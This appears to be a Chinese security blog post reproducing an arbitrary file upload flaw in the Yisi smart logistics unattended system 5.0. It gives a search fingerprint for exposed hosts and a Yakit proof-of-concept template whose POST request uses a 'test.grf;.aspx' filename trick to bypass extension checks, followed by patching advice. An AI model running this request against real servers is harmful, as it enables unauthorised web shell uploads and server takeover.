【漏洞复现】易思智能物流无人值守系统文件上传

漏洞复现】易思智能物流无人值守系统文件上传"/>

【漏洞复现】易思智能物流无人值守系统文件上传

公众号：掌控安全EDU 分享更多技术文章，欢迎关注一起探讨学习

目录

【产品介绍】

【漏洞描述】

【影响范围】

【指纹】

【产品介绍】

易思无人值守智能物流系统是一款集成了人工智能、机器人技术和物联网技术的创新产品。它能够自主完成货物存储、检索、分拣、装载以及配送等物流作业，帮助企业实现无人值守的智能物流运营，提高效率、降低成本，为现代物流行业带来新的发展机遇。

【漏洞描述】

易思无人值守智能物流系统/Sys_ReportFile/ImportReport接口处存在任意文件上传漏洞，未经授权的攻击者可通过此漏洞上传恶意后门文件，从而获取服务器权限。

【影响范围】

易思智能物流无人值守系统5.0

【指纹】

web.body=”智能物流无人值守系统”

【Poc检测】 

 【验证】 

【Yakit Poc自动化验证】 

id: Yisi-uploadinfo:name: Yisi-uploadauthor: hackseverity: infodescription: descriptionreference:- https://tags: tagsrequests:- raw:- |POST /Sys_ReportFile/ImportReport?encode=hack HTTP/1.1Host: {{Hostname}}X-File-Name: test.grfUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxzUhGld6cusN3AlkAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 207------WebKitFormBoundaryxzUhGld6cusN3AlkContent-Disposition: form-data; name="file"; .filename="test.grf;.aspx"Content-Type: application/octet-streamtest------WebKitFormBoundaryxzUhGld6cusN3Alk--matchers-condition: andmatchers:- type: wordpart: bodywords:- Custom- type: statusstatus:- 200

 【修复建议】

对上传文件的类型、大小、文件名等进行验证，确保只允许上传合法的文件类型，并限制文件大小和文件名的长度。可以使用白名单或黑名单的方式进行验证。

及时关注和应用厂商发布的安全补丁和更新，修复已知的文件上传漏洞。

没看够~？欢迎关注！